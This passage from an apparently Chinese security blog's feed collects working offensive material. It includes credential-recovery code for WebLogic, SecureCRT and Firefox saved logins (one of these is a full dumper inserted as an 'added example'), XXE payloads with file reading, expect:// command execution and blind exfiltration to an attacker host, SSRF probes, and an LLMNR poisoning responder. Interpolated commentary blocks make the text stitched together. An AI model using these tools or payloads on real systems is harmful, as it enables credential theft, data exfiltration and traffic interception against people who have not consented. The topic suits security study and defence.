-patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblog/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose</div></pre></td></tr></table></figure></p><h2 id="Firefox"><a href="#Firefox" class="headerlink" title="Firefox"></a>Firefox</h2><p>Path to nss3.dll<br>C:\Program Files (x86)\Mozilla Firefox\nss3.dll</p><p>Firefox profile directory, and the files in it that matter (key3.db holds the key that protects the saved logins, logins.json the encrypted logins themselves)<br>C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default<br>cert8.db<br>key3.db<br>logins.json</p><p><code>ff_decrypt.py profilesfolder</code></p><h2 id="SecureCRT"><a href="#SecureCRT" class="headerlink" title="SecureCRT"></a>SecureCRT</h2><p><a href="https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py" target="_blank" rel="external">https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py</a></p><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">from Crypto.Cipher import Blowfish  # pycryptodome; the original script targeted Python 2 / PyCrypto</div><div class="line"></div><div class="line"># Two static Blowfish keys hard-coded in SecureCRT; both layers run in CBC mode with an all-zero IV</div><div class="line">KEY1 = bytes.fromhex('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7')</div><div class="line">KEY2 = bytes.fromhex('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07')</div><div class="line"></div><div class="line">def decrypt(password):</div><div class="line">    c1 = Blowfish.new(KEY1, Blowfish.MODE_CBC, b'\x00' * 8)</div><div class="line">    c2 = Blowfish.new(KEY2, Blowfish.MODE_CBC, b'\x00' * 8)</div><div class="line">    # Outer layer first; drop its 4-byte prefix and suffix, then peel the inner layer</div><div class="line">    padded = c1.decrypt(c2.decrypt(bytes.fromhex(password))[4:-4])</div><div class="line">    # Plaintext is UTF-16LE terminated by a double NUL; also stop at the end of the buffer, otherwise a blob without terminator loops forever</div><div class="line">    p = b''</div><div class="line">    while len(padded) >= 2 and padded[:2] != b'\x00\x00':</div><div class="line">        p += padded[:2]</div><div class="line">        padded = padded[2:]</div><div class="line">    return p.decode('utf-16-le')</div><div class="line"></div><div class="line">print(decrypt("xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345"))  # hex string taken from the session .ini (value masked here)</div></pre></td></tr></table></figure><h2 id="Foxmail"><a href="#Foxmail" class="headerlink" title="Foxmail"></a>Foxmail</h2><p>Versions below 7.0: Foxmail\Storage\test@domain.com\Accounts\Account.stg<br>Versions 7.0 and later: Account.cfg</p><ol><li>Account.stg files can be decrypted with existing tools.</li><li>For the Account.cfg format, copy the Account directory into the Storage directory of a Foxmail installation of the same version, add the new mailbox Storage\test@domain.com\ to FMStorage.list, start the client and read the password with an asterisk-password revealer.</li></ol><h2 id="Outlook"><a href="#Outlook" class="headerlink" title="Outlook"></a>Outlook</h2>]]></content>
<summary type="html">
<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>Recovering passwords stored by common software</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol>
<li>Console login password (boot.properties)</li>
<li>Data source configuration file (Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">import weblogic.security.internal.*;</div><div class="line">import weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line">/**</div><div class="line"> * Decrypts a WebLogic encrypted string (for example an &#123;AES&#125;... value) with the domain's own encryption service.</div><div class="line"> * Password file: Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</div><div class="line"> * Key file: Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</div><div class="line"> */</div><div class="line">public class WebLogicDecryptor &#123;</div><div class="line">    private static ClearOrEncryptedService ces;</div><div class="line"></div><div class="line">    public static void main(String[] args) throws Exception &#123;</div><div class="line">        // Both arguments are needed; the original tested for fewer than 1 and then dereferenced args[1]</div><div class="line">        if (args.length &lt; 2) &#123;</div><div class="line">            throw new Exception("must set [domainDir] [encryptStr]");</div><div class="line">        &#125;</div><div class="line">        ces = new ClearOrEncryptedService(</div><div class="line">                SerializedSystemIni.getEncryptionService(args[0])); // your_domain</div><div class="line">        System.out.println("Decrypted: " + ces.decrypt(args[1])); // &#123;AES&#125;9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe</div><div class="line">    &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
</summary>
</entry>
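<![CDATA[
The Firefox section names ff_decrypt.py but does not show what such a tool does. Added example, not the post's tool and not code from the original: Firefox protects saved logins with NSS's PK11SDR (the key lives in key3.db, or key4.db in newer profiles, and the ciphertexts in logins.json), so the cleanest way to decrypt them is to call nss3.dll itself through ctypes, exactly as the browser does. Assumptions: the nss3.dll and profile paths as listed above, an empty master password unless one is passed, and a legacy key3.db profile (pass legacy_db=False for key4.db, which NSS opens through a "sql:" prefix). SAMPLE_LOGINS_JSON is a constructed logins.json fragment for an offline check of the parser; its blobs are not real ciphertext.

```python
import base64
import ctypes
import json
import os
import sys
from ctypes import POINTER, Structure, addressof, byref, c_char_p, c_int, c_uint, c_void_p


class SECItem(Structure):
    """NSS SECItem: item type, pointer to the data, length in bytes."""
    _fields_ = [("type", c_uint), ("data", c_void_p), ("len", c_uint)]


def parse_logins(logins_json_text):
    """Return one (hostname, encrypted_username, encrypted_password) tuple per saved login.

    logins.json stores both encrypted fields as base64 of the PK11SDR blob."""
    doc = json.loads(logins_json_text)
    return [
        (entry["hostname"],
         base64.b64decode(entry["encryptedUsername"]),
         base64.b64decode(entry["encryptedPassword"]))
        for entry in doc["logins"]
    ]


class NssDecryptor:
    """Drives nss3.dll through ctypes the way Firefox itself does when it fills in a login form."""

    def __init__(self, nss3_path, profile_dir, master_password="", legacy_db=True):
        # nss3.dll depends on mozglue.dll and friends in the same directory, so make it searchable
        if hasattr(os, "add_dll_directory"):
            os.add_dll_directory(os.path.dirname(os.path.abspath(nss3_path)))
        nss = self.nss = ctypes.CDLL(nss3_path)
        nss.NSS_Init.argtypes = [c_char_p]
        nss.NSS_Init.restype = c_int
        nss.NSS_Shutdown.restype = c_int
        nss.PK11_GetInternalKeySlot.restype = c_void_p
        nss.PK11_FreeSlot.argtypes = [c_void_p]
        nss.PK11_CheckUserPassword.argtypes = [c_void_p, c_char_p]
        nss.PK11_CheckUserPassword.restype = c_int
        nss.PK11SDR_Decrypt.argtypes = [POINTER(SECItem), POINTER(SECItem), c_void_p]
        nss.PK11SDR_Decrypt.restype = c_int
        nss.SECITEM_ZfreeItem.argtypes = [POINTER(SECItem), c_int]

        # key3.db profiles open from the plain directory; key4.db (Firefox 58+) needs the "sql:" prefix
        db_spec = profile_dir if legacy_db else "sql:" + profile_dir
        if nss.NSS_Init(db_spec.encode("utf-8")) != 0:
            raise RuntimeError("NSS_Init failed for " + db_spec)
        slot = nss.PK11_GetInternalKeySlot()
        if not slot:
            raise RuntimeError("PK11_GetInternalKeySlot failed")
        try:
            # Unlocks the key database; the empty string is the default master password
            if nss.PK11_CheckUserPassword(slot, master_password.encode("utf-8")) != 0:
                raise RuntimeError("master password rejected")
        finally:
            nss.PK11_FreeSlot(slot)

    def decrypt(self, blob):
        buf = ctypes.create_string_buffer(blob, len(blob))
        inp = SECItem(0, addressof(buf), len(blob))
        out = SECItem(0, None, 0)
        if self.nss.PK11SDR_Decrypt(byref(inp), byref(out), None) != 0:
            raise RuntimeError("PK11SDR_Decrypt failed (wrong profile or master password?)")
        try:
            return ctypes.string_at(out.data, out.len).decode("utf-8")
        finally:
            self.nss.SECITEM_ZfreeItem(byref(out), 0)  # free the buffer NSS allocated, not the item itself

    def close(self):
        self.nss.NSS_Shutdown()


def dump_logins(nss3_path, profile_dir, master_password="", legacy_db=True):
    """Decrypt every entry of profile_dir/logins.json; returns (hostname, username, password) tuples."""
    with open(os.path.join(profile_dir, "logins.json"), encoding="utf-8") as f:
        entries = parse_logins(f.read())
    dec = NssDecryptor(nss3_path, profile_dir, master_password, legacy_db)
    try:
        return [(host, dec.decrypt(user), dec.decrypt(pw)) for host, user, pw in entries]
    finally:
        dec.close()


# Constructed logins.json fragment for an offline check of the parser; the blobs are not real ciphertext
SAMPLE_LOGINS_JSON = json.dumps({"logins": [{
    "hostname": "https://intranet.example",
    "encryptedUsername": base64.b64encode(b"fake-user-blob").decode("ascii"),
    "encryptedPassword": base64.b64encode(b"fake-pass-blob").decode("ascii"),
}]})


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: ff_nss_decrypt.py <nss3.dll> <profile dir> [master password]")
    for host, user, pw in dump_logins(*sys.argv[1:4]):
        print(host, user, pw)
```

Run it on the machine that holds the profile (or with a copied profile directory and a matching nss3.dll); a non-empty master password turns the PK11_CheckUserPassword step into the one place the tool can fail, which is why it is checked before any decryption is attempted.
]]>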
<entry>
<title>XXE</title>
<link href="http://ruos.org/2018/05/11/XXE/"/>
<id>http://ruos.org/2018/05/11/XXE/</id>
<published>2018-05-11T03:01:33.000Z</published>
<updated>2018-05-11T03:20:20.131Z</updated>
<content type="html"><![CDATA[<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>Reading local resources: the parser expands the external entity with the contents of the named file</p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line">$xml=<<<XML</div><div class="line"><?xml version="1.0" encoding="ISO-8859-1"?></div><div class="line"><!DOCTYPE foo [</div><div class="line">  <!ELEMENT foo ANY ></div><div class="line">  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo></div><div class="line">XML;</div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line">?></div></pre></td></tr></table></figure><p>Remote code execution; requires the PHP expect extension, which registers the expect:// stream wrapper</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0" encoding="ISO-8859-1"?></div><div class="line"><!DOCTYPE foo [</div><div class="line">  <!ELEMENT foo ANY ></div><div class="line">  <!ENTITY xxe SYSTEM "expect://id" >]></div><div class="line"><creds></div><div class="line">  <user>&xxe;</user></div><div class="line">  <pass>mypass</pass></div><div class="line"></creds></div></pre></td></tr></table></figure><a id="more"></a><p>Probing the internal network: the server-side parser makes the HTTP request, so response time and error messages reveal whether the host and port are reachable</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0" ?></div><div class="line"><!DOCTYPE ANY [</div><div class="line"><!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >]><foo>&xxe;</foo></div></pre></td></tr></table></figure><p>Tag injection<br>Injecting markup into the document body</p><h4 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h4><p>Nested remote entities: when the application does not echo the parsed content, a parameter entity loaded from the attacker's host wraps the file contents into a second request that carries them out</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0"?></div><div class="line"><!DOCTYPE ANY [</div><div class="line"><!ENTITY % file SYSTEM "file:///C:/1.txt"></div><div class="line"><!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt"></div><div class="line">%remote;</div><div class="line">%all;</div><div class="line">%send;</div><div class="line">]></div></pre></td></tr></table></figure><p>evil.txt, served from the attacker's host<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>"></div></pre></td></tr></table></figure></p><h3 id="Testing-for-XML-Injection"><a href="#Testing-for-XML-Injection" class="headerlink" title="Testing for XML Injection"></a>Testing for XML Injection</h3><p>Break the XML syntax so that the application returns a parser error</p><p>If the ‘&’ character is not itself encoded as &amp;, it can be used to test for XML injection.</p><p><a href="https://github.com/xmendez/wfuzz/" target="_blank" rel="external">https://github.com/xmendez/wfuzz/</a></p><h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>Example</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">POST /hrss/dorado/smartweb2.RPC.d?__rpc=true</div><div class="line"></div><div class="line">__type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067</div></pre></td></tr></table></figure><p>Payload whose result is echoed in the response (%26 is the URL-encoded &, since the XML travels inside the __xml form field)<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><!DOCTYPE ANY[</div><div class="line"><!ENTITY xxe SYSTEM "/">]></div><div class="line"><rpc method="noteInputCount"></div><div class="line">    <ps></div><div class="line">        <p name="user_code">1</p></div><div class="line">    </ps></div><div class="line">    <vps></div><div class="line">        <p name="DEFAULT_DATA_SOURCE">%26xxe;</p></div><div class="line">    </vps></div><div class="line"></rpc></div></pre></td></tr></table></figure></p><h2 id="SSRF-Server-Side-Request-Forgery"><a href="#SSRF-Server-Side-Request-Forgery" class="headerlink" title="SSRF (Server-Side Request Forgery)"></a>SSRF (Server-Side Request Forgery)</h2><p>Internal port probing</p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line">// Port probe: $host and $port are taken from the request, so the caller picks the internal target</div><div class="line">if(!$fp = fsockopen($host, intval($port), $errno, $errstr, 5)){</div><div class="line">    echo "$errno $errstr\n";</div><div class="line">}</div><div class="line">else{</div><div class="line">    echo "Port open.\n";</div><div class="line">    if($fp){</div><div class="line">        fclose($fp);</div><div class="line">    }</div><div class="line">}</div><div class="line">?></div></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line">// Fetching a page: with a caller-supplied URL the server requests internal hosts on the caller's behalf</div><div class="line">$ch = curl_init();</div><div class="line">curl_setopt($ch, CURLOPT_URL, "http://www.example.com/");</div><div class="line">curl_setopt($ch, CURLOPT_HEADER, 0);</div><div class="line">echo curl_exec($ch);</div><div class="line">curl_close($ch);</div><div class="line">?></div></pre></td></tr></table></figure><h2 id="XPath-injection"><a href="#XPath-injection" class="headerlink" title="XPath injection"></a>XPath injection</h2><p>XPath uses path expressions to select nodes or node sets from an XML document.</p>]]></content>
<summary type="html">
<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>Reading local resources: the parser expands the external entity with the contents of the named file</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$xml=<span class="string">&lt;&lt;&lt;XML</span></div><div class="line"><span class="string">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span></div><div class="line"><span class="string">&lt;!DOCTYPE foo [ </span></div><div class="line"><span class="string"> &lt;!ELEMENT foo ANY &gt;</span></div><div class="line"><span class="string"> &lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</span></div><div class="line"><span class="string">XML;</span></div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>Remote code execution; requires the PHP expect extension, which registers the expect:// stream wrapper</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta">&lt;?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span><span class="meta">?&gt;</span></span></div><div class="line"><span class="meta">&lt;!DOCTYPE foo [ </span></div><div class="line"><span class="meta"> &lt;!ELEMENT foo ANY &gt;</span></div><div class="line"><span class="meta"> &lt;!ENTITY xxe SYSTEM "expect://id" &gt;]&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">creds</span>&gt;</span></div><div class="line"> <span class="tag">&lt;<span class="name">user</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">user</span>&gt;</span></div><div class="line"> <span class="tag">&lt;<span class="name">pass</span>&gt;</span>mypass<span class="tag">&lt;/<span class="name">pass</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">creds</span>&gt;</span></div></pre></td></tr></table></figure>
</summary>
</entry>
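<![CDATA[
The PHP example above reads /etc/passwd through simplexml_load_string. Added example, not from the original post, showing the same entity expansion and the hardened side by side with Python's standard library: xml.sax fetches SYSTEM entities only when the feature_external_ges feature is switched on (it is off by default), so the block parses the page's payload twice, once with the feature enabled and once with the default. The target file and its contents are constructed in a temporary directory so the demo runs offline; the file:// URL in the SYSTEM identifier is built from that path.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd, so the demo only reads a file it created itself
SECRET = "root:x:0:0:root:/root:/bin/bash"

# Same shape as the payload above; %s receives the file:// URL of the target
PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [\n'
    '  <!ELEMENT foo ANY >\n'
    '  <!ENTITY xxe SYSTEM "%s" >\n'
    ']>\n'
    '<foo>&xxe;</foo>\n'
)


class TextCollector(ContentHandler):
    """Collects character data, i.e. whatever &xxe; expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse(xml_text, resolve_external_entities):
    """Parse with xml.sax; feature_external_ges decides whether SYSTEM entities are fetched.

    Off (the default) is the hardened configuration; an application that switches it on
    is the Python counterpart of the PHP snippet above."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(handler.parts)


def demo():
    """Returns (text leaked by the vulnerable parser, text produced by the default parser)."""
    with tempfile.TemporaryDirectory() as tmp:
        target = pathlib.Path(tmp) / "passwd"
        target.write_text(SECRET, encoding="utf-8")
        payload = PAYLOAD % target.as_uri()
        leaked = parse(payload, True)   # entity resolved: the file contents become the text of <foo>
        safe = parse(payload, False)    # entity ignored: <foo> stays empty
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("feature_external_ges=True  ->", repr(leaked))
    print("feature_external_ges=False ->", repr(safe))
```

The same switch exists under other names elsewhere (LIBXML_NOENT in PHP's libxml binding, the external-general-entities SAX feature in Java), and the fix is the same in each: keep external entity resolution off, or parse untrusted XML through a hardened wrapper such as defusedxml.
]]>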
<entry>
<title>Name-spoofing man-in-the-middle attacks</title>
<link href="http://ruos.org/2017/12/14/%E5%90%8D%E7%A7%B0%E6%AC%BA%E9%AA%97%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB/"/>
<id>http://ruos.org/2017/12/14/名称欺骗中间人攻击/</id>
<published>2017-12-14T01:29:00.000Z</published>
<updated>2017-12-14T01:33:22.032Z</updated>
<content type="html"><![CDATA[<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="名称欺骗中间人攻击"></a>Name-spoofing man-in-the-middle attacks</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR)</p><p>When we run <code>ping WEBTST01</code>, the host sends an LLMNR query to resolve WEBTST01. Every LLMNR packet goes to the multicast address 224.0.0.252 (MAC <code>01:00:5E:00:00:FC</code>), and the host that owns the name answers the query with a unicast reply.</p><p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p><h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p><ul><li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li><li>QR - Query/Response.</li><li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li><li>C - Conflict.</li><li>TC - TrunCation.</li><li>T - Tentative.</li><li>Z - Reserved for future use.</li><li>RCODE - Response code.</li><li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li><li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li><li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li><li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li></ul><a id="more"></a><h4 id="LLMNR-Poison"><a href="#LLMNR-Poison" class="headerlink" title="LLMNR Poison"></a>LLMNR Poison</h4><p>IP spoofing through name resolution: the query is multicast to the whole segment, so any host on it can answer with an address of its choosing.</p><p>Python demo of a spoofed LLMNR responder<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env python3</div><div class="line"></div><div class="line">__doc__ = """</div><div class="line"> LLMNR Answer, by Her0in (Python 3 port of the original Python 2 script)</div><div class="line">"""</div><div class="line"></div><div class="line">import socket, struct</div><div class="line"></div><div class="line"></div><div class="line">class LLMNR_Answer:</div><div class="line">    def __init__(self, addr):</div><div class="line">        self.IPADDR = addr  # address that every poisoned answer resolves to</div><div class="line">        self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</div><div class="line">        self.init_socket()</div><div class="line"></div><div class="line">    def build_answer(self, tid, name):</div><div class="line">        # LLMNR reuses the DNS message layout: header, the echoed question, one A record answer</div><div class="line">        header = (tid                # Transaction ID copied from the query</div><div class="line">                  + b"\x80\x00"      # Flags: response (0x8000); a query carries 0x0000</div><div class="line">                  + b"\x00\x01"      # Questions</div><div class="line">                  + b"\x00\x01"      # Answer RRs</div><div class="line">                  + b"\x00\x00"      # Authority RRs</div><div class="line">                  + b"\x00\x00")     # Additional RRs</div><div class="line">        qname = struct.pack(">B", len(name)) + name + b"\x00"  # single label, NUL terminated</div><div class="line">        question = qname + b"\x00\x01" + b"\x00\x01"           # Type A (IPv6 would be 0x001c), class IN</div><div class="line">        answer = (qname</div><div class="line">                  + b"\x00\x01"          # Type A</div><div class="line">                  + b"\x00\x01"          # Class IN</div><div class="line">                  + b"\x00\x00\x00\x1e"  # TTL, 30 s</div><div class="line">                  + b"\x00\x04"          # RDLENGTH of an IPv4 address</div><div class="line">                  + socket.inet_aton(self.IPADDR))</div><div class="line">        return header + question + answer</div><div class="line"></div><div class="line">    def init_socket(self):</div><div class="line">        self.HOST = "192.168.15.165"  # our own address on the target segment</div><div class="line">        self.PORT = 5355</div><div class="line">        self.MulADDR = "224.0.0.252"</div><div class="line">        self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)</div><div class="line">        self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)</div><div class="line">        self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,</div><div class="line">                            socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"></div><div class="line">    def Answer(self):</div><div class="line">        # Bind to all addresses: on Linux a socket bound to the unicast address alone does not receive the multicast queries</div><div class="line">        self.las.bind(("", self.PORT))</div><div class="line">        print("Listening...")</div><div class="line">        try:</div><div class="line">            while True:</div><div class="line">                data, addr = self.las.recvfrom(1024)</div><div class="line">                if len(data) < 13 or data[2] & 0x80:</div><div class="line">                    continue  # too short, or a response rather than a query</div><div class="line">                tid = data[0:2]</div><div class="line">                namelen = data[12]</div><div class="line">                name = data[13:13 + namelen]</div><div class="line">                print("Poisoned answer(%s) sent to %s for name %s" % (self.IPADDR, addr[0], name.decode(errors="replace")))</div><div class="line">                self.las.sendto(self.build_answer(tid, name), addr)</div><div class="line">        except KeyboardInterrupt:</div><div class="line">            pass</div><div class="line">        finally:</div><div class="line">            self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,</div><div class="line">                                socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line">            self.las.close()</div><div class="line"></div><div class="line"></div><div class="line">if __name__ == "__main__":</div><div class="line">    llmnr = LLMNR_Answer("11.22.33.44")</div><div class="line">    llmnr.Answer()</div></pre></td></tr></table></figure></p><h3 id="Network-Basic-Input-Output-System-NetBIOS"><a href="#Network-Basic-Input-Output-System-NetBIOS" class="headerlink" title="Network Basic Input/Output System (NetBIOS)"></a>Network Basic Input/Output System (NetBIOS)</h3><p>NetBIOS is an API providing various networking services.</p><p>NetBIOS provides three distinct services:</p><ul><li>Name service for name registration and resolution (ports: 137/udp and 137/tcp)</li><li>Datagram distribution service for connectionless communication (port: 138/udp)</li><li>Session 
